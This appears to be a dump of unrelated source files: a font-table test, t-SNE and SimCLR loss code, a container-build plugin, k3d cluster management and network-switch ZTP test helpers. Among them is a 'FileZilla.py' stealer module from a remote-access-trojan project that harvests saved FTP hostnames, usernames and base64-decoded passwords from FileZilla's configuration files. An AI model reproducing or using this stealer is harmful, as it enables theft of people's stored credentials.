string = re.sub('<checkSumAdjustment value="[^"]+"/>', '', string)
string = re.sub('<modified value="[^"]+"/>', '', string)
return string
class CFFTableTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
with open(CFF_BIN, 'rb') as f:
font = TTFont(file=CFF_BIN)
cffTable = font['CFF2']
cls.cff2Data = cffTable.compile(font)
with open(CFF_TTX, 'r') as f:
cff2XML = f.read()
cff2XML = strip_VariableItems(cff2XML)
cls.cff2XML = cff2XML.splitlines()
def test_toXML(self):
font = TTFont(file=CFF_BIN)
cffTable = font['CFF2']
cffData = cffTable.compile(font)
out = StringIO()
font.saveXML(out)
cff2XML = out.getvalue()
cff2XML = strip_VariableItems(cff2XML)
cff2XML = cff2XML.splitlines()
self.assertEqual(cff2XML, self.cff2XML)
def test_fromXML(self):
font = TTFont(sfntVersion='OTTO')
font.importXML(CFF_TTX)
cffTable = font['CFF2']
cff2Data = cffTable.compile(font)
self.assertEqual(cff2Data, self.cff2Data)
if __name__ == "__main__":
unittest.main()
|
tfumap/parametric_tsne.py | EhsanKA/ParametricUMAP_paper | 124 | 32415 | ### based on https://github.com/kylemcdonald/Parametric-t-SNE/blob/master/Parametric%20t-SNE%20(Keras).ipynb
import numpy as np
from tensorflow.keras import backend as K
from tensorflow.keras.losses import categorical_crossentropy
from tqdm.autonotebook import tqdm
import tensorflow as tf
def Hbeta(D, beta):
"""Computes the Gaussian kernel values given a vector of
squared Euclidean distances, and the precision of the Gaussian kernel.
The function also computes the perplexity (P) of the distribution."""
P = np.exp(-D * beta)
sumP = np.sum(P)
H = np.log(sumP) + beta * np.sum(np.multiply(D, P)) / sumP
P = P / sumP
return H, P
def x2p(X, u=15, tol=1e-4, print_iter=500, max_tries=50, verbose=0):
"""
% X2P Identifies appropriate sigma's to get kk NNs up to some tolerance
%
% [P, beta] = x2p(xx, kk, tol)
%
% Identifies the required precision (= 1 / variance^2) to obtain a Gaussian
% kernel with a certain uncertainty for every datapoint. The desired
% uncertainty can be specified through the perplexity u (default = 15). The
% desired perplexity is obtained up to some tolerance that can be specified
% by tol (default = 1e-4).
% The function returns the final Gaussian kernel in P, as well as the
% employed precisions per instance in beta.
%
"""
# Initialize some variables
n = X.shape[0] # number of instances
P = np.zeros((n, n)) # empty probability matrix
beta = np.ones(n) # empty precision vector
logU = np.log(u) # log of perplexity (= entropy)
# Compute pairwise distances
if verbose > 0:
print("Computing pairwise distances...")
sum_X = np.sum(np.square(X), axis=1)
# note: translating sum_X' from matlab to numpy means using reshape to add a dimension
D = sum_X + sum_X[:, None] + -2 * X.dot(X.T)
# Run over all datapoints
if verbose > 0:
print("Computing P-values...")
for i in range(n):
if verbose > 1 and print_iter and i % print_iter == 0:
print("Computed P-values {} of {} datapoints...".format(i, n))
# Set minimum and maximum values for precision
betamin = float("-inf")
betamax = float("+inf")
# Compute the Gaussian kernel and entropy for the current precision
indices = np.concatenate((np.arange(0, i), np.arange(i + 1, n)))
Di = D[i, indices]
H, thisP = Hbeta(Di, beta[i])
# Evaluate whether the perplexity is within tolerance
Hdiff = H - logU
tries = 0
while abs(Hdiff) > tol and tries < max_tries:
# If not, increase or decrease precision
if Hdiff > 0:
betamin = beta[i]
if np.isinf(betamax):
beta[i] *= 2
else:
beta[i] = (beta[i] + betamax) / 2
else:
betamax = beta[i]
if np.isinf(betamin):
beta[i] /= 2
else:
beta[i] = (beta[i] + betamin) / 2
# Recompute the values
H, thisP = Hbeta(Di, beta[i])
Hdiff = H - logU
tries += 1
# Set the final row of P
P[i, indices] = thisP
if verbose > 0:
print("Mean value of sigma: {}".format(np.mean(np.sqrt(1 / beta))))
print("Minimum value of sigma: {}".format(np.min(np.sqrt(1 / beta))))
print("Maximum value of sigma: {}".format(np.max(np.sqrt(1 / beta))))
return P, beta
def compute_joint_probabilities(
samples, batch_size=5000, d=2, perplexity=30, tol=1e-5, verbose=0
):
""" This function computes the probababilities in X, split up into batches
% Gaussians employed in the high-dimensional space have the specified
% perplexity (default = 30). The number of degrees of freedom of the
% Student-t distribution may be specified through v (default = d - 1).
"""
v = d - 1
# Initialize some variables
n = samples.shape[0]
batch_size = min(batch_size, n)
# Precompute joint probabilities for all batches
if verbose > 0:
print("Precomputing P-values...")
batch_count = int(n / batch_size)
P = np.zeros((batch_count, batch_size, batch_size))
# for each batch of data
for i, start in enumerate(tqdm(range(0, n - batch_size + 1, batch_size))):
# select batch
curX = samples[start : start + batch_size]
# compute affinities using fixed perplexity
P[i], _ = x2p(curX, perplexity, tol, verbose=verbose)
# make sure we don't have NaN's
P[i][np.isnan(P[i])] = 0
# make symmetric
P[i] = P[i] + P[i].T # / 2
# obtain estimation of joint probabilities
P[i] = P[i] / P[i].sum()
P[i] = np.maximum(P[i], np.finfo(P[i].dtype).eps)
return P
def z2p(z, d, n, eps=10e-15):
""" Computes the low dimensional probability
"""
v = d - 1
sum_act = tf.math.reduce_sum(tf.math.square(z), axis=1)
Q = K.reshape(sum_act, [-1, 1]) + -2 * tf.keras.backend.dot(z, tf.transpose(z))
Q = (sum_act + Q) / v
Q = tf.math.pow(1 + Q, -(v + 1) / 2)
Q *= 1 - np.eye(n)
Q /= tf.math.reduce_sum(Q)
Q = tf.math.maximum(Q, eps)
return Q
def tsne_loss(d, batch_size, eps=10e-15):
# v = d - 1.0
def loss(P, Z):
""" KL divergence
P is the joint probabilities for this batch (Keras loss functions call this y_true)
Z is the low-dimensional output (Keras loss functions call this y_pred)
"""
Q = z2p(Z, d, n=batch_size, eps=eps)
return tf.math.reduce_sum(P * tf.math.log((P + eps) / (Q + eps)))
return loss
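# Minimal end-to-end sketch (illustrative addition): only compute_joint_probabilities
# and tsne_loss come from this module; the encoder architecture and random data are
# placeholder assumptions. shuffle=False keeps each batch aligned with its
# precomputed P matrix.
def _parametric_tsne_example():
    n, in_dim, out_dim, batch_size = 5000, 784, 2, 5000
    X = np.random.rand(n, in_dim).astype("float32")
    P = compute_joint_probabilities(X, batch_size=batch_size, d=out_dim, perplexity=30)
    encoder = tf.keras.Sequential([
        tf.keras.layers.Dense(500, activation="relu", input_shape=(in_dim,)),
        tf.keras.layers.Dense(500, activation="relu"),
        tf.keras.layers.Dense(out_dim),
    ])
    encoder.compile(optimizer="adam", loss=tsne_loss(d=out_dim, batch_size=batch_size))
    # y_true for each sample is its row of the joint-probability matrix of its batch
    encoder.fit(X, P.reshape(-1, batch_size), batch_size=batch_size, shuffle=False, epochs=10)
    return encoder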
|
atomic_reactor/plugins/check_and_set_platforms.py | qixiang/atomic-reactor | 113 | 32438 | <filename>atomic_reactor/plugins/check_and_set_platforms.py
"""
Copyright (c) 2018 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
Query the koji build target, if any, to find the enabled architectures. Remove any excluded
architectures, and return the resulting list.
"""
from typing import List, Optional
from atomic_reactor.plugin import Plugin
from atomic_reactor.util import is_scratch_build, is_isolated_build, map_to_user_params
from atomic_reactor.constants import PLUGIN_CHECK_AND_SET_PLATFORMS_KEY
from atomic_reactor.config import get_koji_session
class CheckAndSetPlatformsPlugin(Plugin):
key = PLUGIN_CHECK_AND_SET_PLATFORMS_KEY
is_allowed_to_fail = False
args_from_user_params = map_to_user_params("koji_target")
def __init__(self, workflow, koji_target=None):
"""
constructor
:param workflow: DockerBuildWorkflow instance
:param koji_target: str, Koji build target name
"""
# call parent constructor
super(CheckAndSetPlatformsPlugin, self).__init__(workflow)
self.koji_target = koji_target
def _limit_platforms(self, platforms: List[str]) -> List[str]:
"""Limit platforms in a specific range by platforms config.
:param platforms: a list of platforms to be filtered.
:type platforms: list[str]
:return: the limited platforms.
:rtype: list[str]
"""
final_platforms = set(platforms)
source_config = self.workflow.source.config
only_platforms = set(source_config.only_platforms)
excluded_platforms = set(source_config.excluded_platforms)
if only_platforms:
if only_platforms == excluded_platforms:
self.log.warning('only and not platforms are the same: %r', only_platforms)
final_platforms &= only_platforms
return list(final_platforms - excluded_platforms)
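    # Worked example of the filtering above (values are illustrative only):
    # with platforms = ['x86_64', 'aarch64', 's390x'], only_platforms = {'x86_64',
    # 'aarch64'} and excluded_platforms = {'aarch64'}, the intersection keeps
    # {'x86_64', 'aarch64'} and the final result is ['x86_64'].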
def run(self) -> Optional[List[str]]:
"""
run the plugin
"""
user_platforms: Optional[List[str]] = self.workflow.user_params.get("platforms")
if self.koji_target:
koji_session = get_koji_session(self.workflow.conf)
self.log.info("Checking koji target for platforms")
event_id = koji_session.getLastEvent()['id']
target_info = koji_session.getBuildTarget(self.koji_target, event=event_id)
build_tag = target_info['build_tag']
koji_build_conf = koji_session.getBuildConfig(build_tag, event=event_id)
koji_platforms = koji_build_conf['arches']
if not koji_platforms:
self.log.info("No platforms found in koji target")
return None
platforms = koji_platforms.split()
self.log.info("Koji platforms are %s", sorted(platforms))
if is_scratch_build(self.workflow) or is_isolated_build(self.workflow):
override_platforms = set(user_platforms or [])
if override_platforms and override_platforms != set(platforms):
sorted_platforms = sorted(override_platforms)
self.log.info("Received user specified platforms %s", sorted_platforms)
self.log.info("Using them instead of koji platforms")
# platforms from user params do not match platforms from koji target
# that almost certainly means they were overridden and should be used
self.workflow.build_dir.init_build_dirs(sorted_platforms, self.workflow.source)
return sorted_platforms
else:
platforms = user_platforms
self.log.info(
"No koji platforms. User specified platforms are %s",
sorted(platforms) if platforms else None,
)
if not platforms:
raise RuntimeError("Cannot determine platforms; no koji target or platform list")
# Filter platforms based on configured remote hosts
remote_host_pools = self.workflow.conf.remote_hosts.get("pools", {})
enabled_platforms = []
defined_but_disabled = []
def has_enabled_hosts(platform: str) -> bool:
platform_hosts = remote_host_pools.get(platform, {})
return any(host_info["enabled"] for host_info in platform_hosts.values())
for p in platforms:
if has_enabled_hosts(p):
enabled_platforms.append(p)
elif p in remote_host_pools:
defined_but_disabled.append(p)
else:
self.log.warning("No remote hosts found for platform '%s' in "
"reactor config map, skipping", p)
if defined_but_disabled:
msg = 'Platforms specified in config map, but have all remote hosts disabled' \
' {}'.format(defined_but_disabled)
raise RuntimeError(msg)
final_platforms = self._limit_platforms(enabled_platforms)
self.log.info("platforms in limits : %s", final_platforms)
if not final_platforms:
self.log.error("platforms in limits are empty")
raise RuntimeError("No platforms to build for")
self.workflow.build_dir.init_build_dirs(final_platforms, self.workflow.source)
return final_platforms
|
solo/losses/simclr.py | xwyzsn/solo-learn | 693 | 32460 | <filename>solo/losses/simclr.py
# Copyright 2021 solo-learn development team.
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies
# or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import torch
import torch.nn.functional as F
from solo.utils.misc import gather, get_rank
def simclr_loss_func(
z: torch.Tensor, indexes: torch.Tensor, temperature: float = 0.1
) -> torch.Tensor:
"""Computes SimCLR's loss given batch of projected features z
from different views, a positive boolean mask of all positives and
a negative boolean mask of all negatives.
Args:
z (torch.Tensor): (N*views) x D Tensor containing projected features from the views.
indexes (torch.Tensor): unique identifiers for each crop (unsupervised)
or targets of each crop (supervised).
Return:
torch.Tensor: SimCLR loss.
"""
z = F.normalize(z, dim=-1)
gathered_z = gather(z)
sim = torch.exp(torch.einsum("if, jf -> ij", z, gathered_z) / temperature)
gathered_indexes = gather(indexes)
indexes = indexes.unsqueeze(0)
gathered_indexes = gathered_indexes.unsqueeze(0)
# positives
pos_mask = indexes.t() == gathered_indexes
pos_mask[:, z.size(0) * get_rank() :].fill_diagonal_(0)
# negatives
neg_mask = indexes.t() != gathered_indexes
pos = torch.sum(sim * pos_mask, 1)
neg = torch.sum(sim * neg_mask, 1)
loss = -(torch.mean(torch.log(pos / (pos + neg))))
return loss
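# Minimal single-process usage sketch (illustrative addition). It assumes gather()
# and get_rank() fall back to identity/0 outside distributed training; with two
# views per image, repeating the sample ids marks crops of the same image as positives.
def _simclr_loss_example():
    batch, n_views, feat_dim = 4, 2, 128
    z = torch.randn(batch * n_views, feat_dim)      # projected features for all crops
    indexes = torch.arange(batch).repeat(n_views)   # tensor([0, 1, 2, 3, 0, 1, 2, 3])
    return simclr_loss_func(z, indexes, temperature=0.1)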
|
src/thenewboston/factories/network_validator.py | achalpatel/thenewboston-python | 122 | 32490 | from factory import Faker
from .network_node import NetworkNodeFactory
from ..constants.network import ACCOUNT_FILE_HASH_LENGTH, BLOCK_IDENTIFIER_LENGTH, MAX_POINT_VALUE, MIN_POINT_VALUE
from ..models.network_validator import NetworkValidator
class NetworkValidatorFactory(NetworkNodeFactory):
daily_confirmation_rate = Faker('pyint', max_value=MAX_POINT_VALUE, min_value=MIN_POINT_VALUE)
root_account_file = Faker('url')
root_account_file_hash = Faker('text', max_nb_chars=ACCOUNT_FILE_HASH_LENGTH)
seed_block_identifier = Faker('text', max_nb_chars=BLOCK_IDENTIFIER_LENGTH)
class Meta:
model = NetworkValidator
abstract = True
|
Core/Stealer/FileZilla.py | HugoMskn/Telegram-RAT | 375 | 32516 | # Import modules
import os
from xml.dom import minidom
from base64 import b64decode
# Fetch servers from FileZilla
FileZilla = os.getenv('AppData') + '\\FileZilla\\'
def StealFileZilla():
if not os.path.exists(FileZilla):
return []
RecentServersPath = FileZilla + 'recentservers.xml'
SiteManagerPath = FileZilla + 'sitemanager.xml'
# Read recent servers
if os.path.exists(RecentServersPath):
xmlDoc = minidom.parse(RecentServersPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': <PASSWORD>(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
# Read sitemanager
if os.path.exists(SiteManagerPath):
xmlDoc = minidom.parse(SiteManagerPath)
Servers = xmlDoc.getElementsByTagName('Server')
for Node in Servers:
Server = {
'Hostname': 'ftp://' + Node.getElementsByTagName('Host')[0].firstChild.data + ':' + Node.getElementsByTagName('Port')[0].firstChild.data + '/',
'Username': Node.getElementsByTagName('User')[0].firstChild.data,
'Password': <PASSWORD>(Node.getElementsByTagName('Pass')[0].firstChild.data).decode()
}
return Server |
src/k3d.py | maiki/k3x | 188 | 32533 | # k3d.py
#
# Copyright 2020 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
import os
import ssl
import subprocess
import time
import urllib.error
import urllib.request
import datetime
from dateutil.parser import parse
from typing import Dict, Iterator, List
from typing import Optional, Tuple, Callable
from gi.repository import GObject
from .config import APP_ENV_PREFIX
from .config import ApplicationSettings
from .config import (DEFAULT_EXTRA_PATH,
DEFAULT_API_SERVER_PORT_RANGE,
DEFAULT_K3D_WAIT_TIME)
from .docker import DockerController
from .helm import HelmChart, cleanup_for_owner
from .utils import (call_in_main_thread,
find_unused_port_in_range,
parse_or_get_address,
find_executable,
run_command_stdout)
from .utils_ui import show_notification
# the header/footer length in the "k3d list" output
K3D_LIST_HEADER_LEN = 3
K3D_LIST_FOOTER_LEN = 1
# directory in the K3s container where we should put manifests so they are loaded automatically
K3D_DOCKER_MANIFESTS_DIR = "/var/lib/rancher/k3s/server/manifests/"
###############################################################################
k3d_exe = find_executable("k3d", extra_paths=DEFAULT_EXTRA_PATH)
logging.debug(f"k3d found at {k3d_exe}")
def run_k3d_command(*args, **kwargs) -> Iterator[str]:
"""
Run a k3d command
"""
logging.debug(f"[K3D] Running k3d command: {args}")
yield from run_command_stdout(k3d_exe, *args, **kwargs)
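# Illustrative helper (not part of the original module): callers typically drain the
# generator to capture the full command output, e.g. for "k3d list".
def _k3d_list_output() -> List[str]:
    return list(run_k3d_command("list"))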
###############################################################################
# errors
###############################################################################
class K3dError(Exception):
"""Base class for other k3d exceptions"""
pass
class EmptyClusterNameError(K3dError):
"""No cluster name"""
pass
class InvalidNumWorkersError(K3dError):
"""Invalid num workers"""
pass
class ClusterCreationError(K3dError):
"""Cluster creation error"""
pass
class ClusterDestructionError(K3dError):
"""Cluster destruction error"""
pass
class ClusterNotFoundError(K3dError):
"""Cluster not found error"""
pass
class NoKubeconfigObtainedError(K3dError):
"""No kubeconfig obtained error"""
pass
class NoServerError(K3dError):
"""No Docker server error"""
pass
###############################################################################
# k3d clusters
###############################################################################
class K3dCluster(GObject.GObject):
name: str = ""
status: str = "running"
num_workers: int = 0
use_registry: bool = False
registry_name: str = None
registry_port: str = None
registry_volume: str = None
cache_hub: bool = False
api_server: str = None
image: str = None
volumes: Dict[str, str] = {}
charts: List[HelmChart] = []
server_args: str = None
__gsignals__ = {
        # a signal emitted when the cluster has been created
"created": (GObject.SIGNAL_RUN_LAST, GObject.TYPE_NONE, (str,)),
        # a signal emitted when the cluster has been destroyed
"destroyed": (GObject.SIGNAL_RUN_LAST, GObject.TYPE_NONE, (str,))
}
def __init__(self, settings: ApplicationSettings, docker: DockerController, **kwargs):
super().__init__()
self._docker = docker
self._settings = settings
self._kubeconfig = None
self._docker_created: Optional[datetime.datetime] = None
self._docker_server_ip = None
self._destroyed = False
self._status = kwargs.pop("status", "running")
self.__dict__.update(kwargs)
# TODO: check the name is valid
if len(self.name) == 0:
            raise EmptyClusterNameError
if self.num_workers < 0:
raise InvalidNumWorkersError
def __str__(self) -> str:
return f"{self.name}"
def __eq__(self, other) -> bool:
if other is None:
return False
if isinstance(other, K3dCluster):
return self.name == other.name
if isinstance(other, str):
return self.name == other
logging.warning(f"Comparing cluster {self.name} to incompatible type {other}")
return NotImplemented
def __ne__(self, other) -> bool:
if other is None:
return True
if isinstance(other, K3dCluster):
return self.name != other.name
if isinstance(other, str):
return self.name != other
logging.warning(f"Comparing cluster {self.name} to incompatible type {other}")
return NotImplemented
def quit(self):
pass
def create(self, wait=True) -> None:
"""
Create the cluster by invoking `k3d create`
"""
args = []
kwargs = {}
if not self.name:
raise EmptyClusterNameError()
args += [f"--name={self.name}"]
if self.use_registry:
args += ["--enable-registry"]
if self.cache_hub:
args += ["--enable-registry-cache"]
if self.registry_volume:
args += [f"--registry-volume={self.registry_volume}"]
if self.registry_name:
args += [f"--registry-name={self.registry_name}"]
if self.registry_port:
args += [f"--registry-port={self.registry_port}"]
if wait:
args += [f"--wait={DEFAULT_K3D_WAIT_TIME}"]
if self.num_workers > 0:
args += [f"--workers={self.num_workers}"]
if self.image:
args += [f"--image={self.image}"]
# create some k3s server arguments
# by default, we add a custom DNS domain with the same name as the cluster
args += [f"--server-arg=--cluster-domain={self.name}.local"]
if self.server_args:
args += [f"--server-arg={arg}" for arg in self.server_args if len(arg) > 0]
# append any extra volumes
for vol_k, vol_v in self.volumes.items():
args += [f"--volume={vol_k}:{vol_v}"]
# append any extra Charts as volumes too
for chart in self.charts:
src = chart.generate(self)
dst = f"{K3D_DOCKER_MANIFESTS_DIR}/{chart.name}.yaml"
args += [f"--volume={src}:{dst}"]
# use the given API port or find an unused one
self.api_server = parse_or_get_address(self.api_server, *DEFAULT_API_SERVER_PORT_RANGE)
logging.info(f"[K3D] Using API address {self.api_server}")
args += [f"--api-port={self.api_server}"]
# check if we must use an env variable for the DOCKER_HOST
docker_host = self._docker.docker_host
default_docker_host = self._docker.default_docker_host
if docker_host != self._docker.default_docker_host:
logging.debug(f"[K3D] Overriding DOCKER_HOST={docker_host} (!= {default_docker_host})")
new_env = os.environ.copy()
new_env["DOCKER_HOST"] = docker_host
kwargs["env"] = new_env
try:
logging.info(f"[K3D] Creating cluster (with {args})")
while True:
try:
line = next(run_k3d_command("create", *args, **kwargs))
logging.debug(f"[K3D] {line}")
# detect errors in the output
if "level=fatal" in line:
raise ClusterCreationError(line.strip())
except StopIteration:
break
except Exception as e:
logging.error(f"Could not create cluster: {e}. Cleaning up...")
self._cleanup()
self._destroyed = True
raise e
logging.info("[K3D] The cluster has been created")
self._status = "running"
call_in_main_thread(lambda: self.emit("created", self.name))
def destroy(self) -> None:
"""
Destroy this cluster with `k3d delete`
"""
logging.info("[K3D] Destroying cluster")
if not self.name:
raise EmptyClusterNameError()
if self._destroyed:
raise ClusterDestructionError("Trying to destroy an already destroyed cluster")
args = []
args += [f"--name={self.name}"]
args += ["--keep-registry-volume"]
while True:
try:
line = next(run_k3d_command("delete", *args))
logging.debug(f"[K3D] {line}")
except StopIteration:
break
self._cleanup()
self._destroyed = True
call_in_main_thread(lambda: self.emit("destroyed", self.name))
def _cleanup(self) -> None:
"""
Cleanup any remaining things after destroying a cluster
"""
logging.debug(f"[K3D] Cleaning up for {self.name}")
cleanup_for_owner(self.name)
@property
def kubeconfig(self) -> Optional[str]:
"""
Get the kubeconfig file for this cluster, or None if no
"""
if self._destroyed:
return None
# cache the kubeconfig: once obtained, it will not change
if not self._kubeconfig:
for _ in range(0, 20):
try:
line = next(run_k3d_command("get-kubeconfig", f"--name={self.name}"))
except StopIteration:
break
except subprocess.CalledProcessError:
logging.debug(f"[K3D] ... KUBECONFIG for {self.name} not ready yet...")
time.sleep(1)
else:
logging.debug(f"[K3D] ... obtained KUBECONFIG for {self.name} at {line}")
self._kubeconfig = line
break
return self._kubeconfig
@property
def running(self) -> bool:
return self._status == "running"
def start(self) -> None:
if not self.running:
args = []
args += [f"--name={self.name}"]
logging.debug(f"[K3D] Starting {self.name}...")
while True:
try:
line = next(run_k3d_command("start", *args))
logging.debug(f"[K3D] {line}")
except StopIteration:
break
def stop(self) -> None:
if self.running:
args = []
args += [f"--name={self.name}"]
logging.debug(f"[K3D] Stopping {self.name}...")
while True:
try:
line = next(run_k3d_command("stop", *args))
logging.debug(f"[K3D] {line}")
except StopIteration:
break
@property
def docker_created(self) -> Optional[datetime.datetime]:
if self._destroyed:
return None
if self._docker_created is None:
c = self._docker.get_container_by_name(self.docker_server_name)
if c:
t = self._docker.get_container_created(c)
if t:
try:
self._docker_created = parse(t)
except Exception as e:
logging.error(f"[K3D] could not parse time string {t}: {e}")
return self._docker_created
@property
def docker_server_name(self) -> Optional[str]:
if self._destroyed:
return None
return f"k3d-{self.name}-server"
@property
def docker_network_name(self) -> Optional[str]:
if self._destroyed:
return None
return f"k3d-{self.name}"
@property
def docker_server_ip(self) -> Optional[str]:
if self._destroyed:
return None
if not self._docker_server_ip:
c = self._docker.get_container_by_name(self.docker_server_name)
if c:
ip = self._docker.get_container_ip(c, self.docker_network_name)
if ip is None:
raise NoServerError(
f"could not obtain server IP for {self.docker_server_name} in network {self.docker_network_name}")
self._docker_server_ip = ip
return self._docker_server_ip
@property
def dashboard_url(self) -> Optional[str]:
if self._destroyed:
return None
ip = self.docker_server_ip
if ip:
return f"https://{self.docker_server_ip}/"
def check_dashboard(self, *args) -> bool:
"""
Check that the Dashboard is ready
"""
try:
context = ssl._create_unverified_context()
return urllib.request.urlopen(self.dashboard_url, context=context).getcode()
except urllib.error.URLError as e:
logging.info(f"Error when checking {self.dashboard_url}: {e}")
return False
def open_dashboard(self, *args) -> None:
import webbrowser
u = self.dashboard_url
if u is not None:
logging.debug(f"[K3D] Opening '{u}' in default web browser")
webbrowser.open(u)
else:
logging.warning(f"[K3D] No URL to open")
@property
def script_environment(self) -> Dict[str, str]:
"""
Return a dictionary with env variables for running scripts for this cluster
"""
# Note: make sure we do not return any non-string value or subprocess.run will throw an exception.
env = {
f"{APP_ENV_PREFIX}_CLUSTER_NAME": str(self.name),
}
if not self._destroyed:
env.update({
f"{APP_ENV_PREFIX}_REGISTRY_ENABLED": "1" if self.use_registry else "",
f"{APP_ENV_PREFIX}_REGISTRY_NAME": str(self.registry_name) if self.registry_name else "",
f"{APP_ENV_PREFIX}_REGISTRY_PORT": str(self.registry_port) if self.registry_port else "",
f"{APP_ENV_PREFIX}_MASTER_IP": str(self.docker_server_ip) if self.docker_server_ip is not None else "",
f"{APP_ENV_PREFIX}_KUBECONFIG": self.kubeconfig if self.kubeconfig is not None else "",
})
return env
GObject.type_register(K3dCluster)
|
spytest/apis/system/ztp.py | shubav/sonic-mgmt | 132 | 32573 | # This file contains the list of API's for operations on ZTP
# @author : <NAME> (<EMAIL>)
from spytest import st
import apis.system.basic as basic_obj
import utilities.utils as utils_obj
import apis.system.switch_configuration as switch_conf_obj
import apis.system.interface as intf_obj
import apis.routing.ip as ip_obj
import apis.system.reboot as reboot_obj
import apis.system.boot_up as boot_up_obj
import datetime
wait_5 = 5
wait_10 = 10
wait_60 = 60
def show_ztp_status(dut, expect_reboot=False, cli_type=""):
"""
Author: <NAME> (<EMAIL>)
API to show ztp status
:param dut:
:return:
"""
cli_type = st.get_ui_type(dut, cli_type=cli_type)
result = dict()
cli_type = "klish" if cli_type in ["rest-put", "rest-patch"] else cli_type
if cli_type not in ["click", "klish"]:
st.error("UNSUPPORTED CLI TYPE")
return result
command = "sudo ztp status" if cli_type == "click" else "show ztp-status"
output = st.show(dut, command, expect_reboot=False, type=cli_type)
file_name = dict()
timestamps = dict()
#excluded_file_name = ["--sonic-mgmt--#"]
if output:
for row in output:
result["filenames"] = list()
result["timestamps"] = list()
if result.get("service"):
pass
else:
result["service"] = row.get("service", "")
# if not result["source"]:
if result.get("source"):
pass
else:
result["source"] = row.get("source", "")
# if not result["status"]:
if result.get("status"):
pass
else:
result["status"] = row.get("status", "")
# if not result["adminmode"]:
if result.get("adminmode"):
pass
else:
result["adminmode"] = row.get("adminmode", "")
# if not result["timestamp"]:
result["timestamp"] = row.get("timestamp", "")
if row.get("filename"):
if cli_type == "click":
values = row["filename"].split(":")
file_name[values[0].strip()] = values[1].strip()
result["filenames"].append(file_name)
elif cli_type == "klish":
file_name[row.get("filename")] = row.get("filestatus")
result["filenames"].append(file_name)
if row.get("filetimestamp"):
timestamps.update({row.get("filename"):row.get("filetimestamp")})
result["timestamps"].append(timestamps)
# if not result["processingtext"]:
# result["processingtext"] = row["processingtext"] if "processingtext" in row and row["processingtext"] else ""
st.debug(result)
return result
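# Shape of the dictionary returned above; the values shown are illustrative
# assumptions, only the keys are taken from the parsing logic:
# {"service": "Inactive", "source": "dhcp-opt67 (eth0)", "status": "SUCCESS",
#  "adminmode": "True", "timestamp": "2020-01-01 00:00:00",
#  "filenames": [{"configdb-json": "SUCCESS"}],
#  "timestamps": [{"configdb-json": "2020-01-01 00:00:00"}]}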
def verify_ztp_config_section_from_status(dut, file_names=list(), status="SUCCESS", cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: <NAME> (<EMAIL>)
API to verify the config section
:param dut:
:param file_names:
:param status:
:return:
"""
is_found = 1
if file_names:
response = show_ztp_status(dut, cli_type=cli_type)
for file_name in file_names:
for names in response["filenames"]:
if names[file_name] != status:
is_found = 0
else:
is_found = 1
if not is_found:
return False
return True
def _verify_ztp_status_with_retry(dut, retry_cnt, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
Author: <NAME> (<EMAIL>)
API to verify ZTP status with retry value
:param dut:
:param retry_cnt:
:return:
"""
not_started_retry_cnt = 0
st.log("Verifying the ZTP status with retry method ...")
for _ in range(1, retry_cnt + 1):
response = show_ztp_status(dut, cli_type=cli_type)
if response["adminmode"] == "True":
st.log("Found that admin mode as {}".format(response["adminmode"]))
if response["service"] == "Inactive":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "SUCCESS":
st.log("Found that status as {}".format(response["status"]))
return True
elif response["service"] == "Processing" or response["service"] == "Active Discovery":
st.log("Found that service as {}".format(response["service"]))
if response["status"] == "IN-PROGRESS":
st.log("Found that status as {}".format(response["status"]))
st.wait(3)
elif response["status"] == "FAILED":
st.log("Found that status as {}".format(response["status"]))
return False
elif response["status"] == "Not Started":
st.log("Found that status as {}".format(response["status"]))
not_started_retry_cnt += 1
if not_started_retry_cnt >= retry_cnt:
return False
st.wait(3)
else:
return True
elif response["service"] == "SUCCESS":
st.log("Found that service as {}".format(response["service"]))
return True
else:
st.log("Found that ZTP is disabled hence enabling it ..")
return False
return False
def poll_ztp_status(dut, status=["IN-PROGRESS", "Not Started"], iteration=40, retry=3, cli_type=""):
cli_type = st.get_ui_type(dut, cli_type=cli_type)
"""
API to poll the ztp status
Author: <NAME> (<EMAIL>)
:param dut:
:param status:
:param iteration:
:param retry:
:return:
"""
i = 1
status = list([str(e) for e in status]) if isinstance(status, list) else [status]
while True:
response = show_ztp_status(dut, cli_type=cli_type)
if response["status"] in status:
st.log("Observed {} during polling ...".format(status))
return True
if i > iteration:
st.log("Max polling interval {} exceeded ...".format(i))
return False
i += 1
st.wait(retry)
# This function should be called after running the "ztp run" command
